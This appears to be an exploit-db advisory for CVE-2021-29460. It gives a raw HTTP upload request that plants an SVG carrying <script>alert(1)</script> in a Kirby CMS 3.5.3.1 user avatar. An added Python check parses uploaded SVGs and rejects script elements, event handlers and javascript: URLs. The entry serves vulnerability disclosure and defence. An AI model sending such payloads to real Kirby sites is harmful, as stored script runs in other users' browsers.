Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)

Published: 28 Apr 2021 | Reported by: Sreenath Raghunathan | Type: exploitdb | Source: www.exploit-db.com

Kirby CMS 3.5.3.1 'file' Cross-Site Scripting (XSS) vulnerability

Code
# Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)
# Date: 21-04-2021
# Exploit Author: Sreenath Raghunathan
# Vendor Homepage: https://getkirby.com/
# Software Link: https://github.com/getkirby/kirby
# Version: 3.5.3.1(REQUIRED)
# CVE : CVE-2021-29460

POST /api/users/<userid>/avatar HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF: <redacted>
Content-Type: multipart/form-data; boundary=---------------------------286121627839893676321700902916
Content-Length: 563
Connection: close
Cookie: <redacted>

-----------------------------286121627839893676321700902916
Content-Disposition: form-data; name="file"; filename="svgxss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900"
stroke="#004400"/>
  "><script>alert(1)</script>
</svg>
-----------------------------286121627839893676321700902916--
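Added here as a defender-side example, not part of the exploit-db record or of Kirby's own code: a Python upload check that parses an SVG before it is stored and served, and rejects it when it carries active content such as the `<script>` element in `svgxss.svg` above, an `on*` event-handler attribute, a `javascript:` URL, or malformed XML. Both sample inputs are constructed; the first mirrors the file body of the request above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the svgxss.svg body from the request above.
MALICIOUS_SVG = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900" stroke="#004400"/>
  "><script>alert(1)</script>
</svg>'''

# Constructed sample: an avatar that should be accepted.
BENIGN_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" fill="#009900"/>
</svg>'''

# Elements that execute or embed active content (compared case-insensitively).
ACTIVE_ELEMENTS = {"script", "foreignobject"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)

def local_name(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]

def svg_findings(data: bytes) -> list:
    """Return the reasons an uploaded SVG must be rejected; an empty list means accept."""
    try:
        root = ET.fromstring(data)          # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    findings = []
    if local_name(root.tag) != "svg":
        findings.append(f"root element is <{local_name(root.tag)}>, not <svg>")
    for elem in root.iter():
        name = local_name(elem.tag)
        if name.lower() in ACTIVE_ELEMENTS:
            findings.append(f"active content element <{name}>")
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            if EVENT_ATTR.match(aname):
                findings.append(f"event handler attribute {aname} on <{name}>")
            if aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {aname} on <{name}>")
    return findings

if __name__ == "__main__":
    for label, blob in (("svgxss.svg", MALICIOUS_SVG), ("benign.svg", BENIGN_SVG)):
        print(label, "->", svg_findings(blob) or "accepted")
```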


Vulners AI Score: 5.8 (Medium risk)
CVSS 2: 3.5
CVSS 3.1: 5.4 - 7.6
EPSS: 0.0112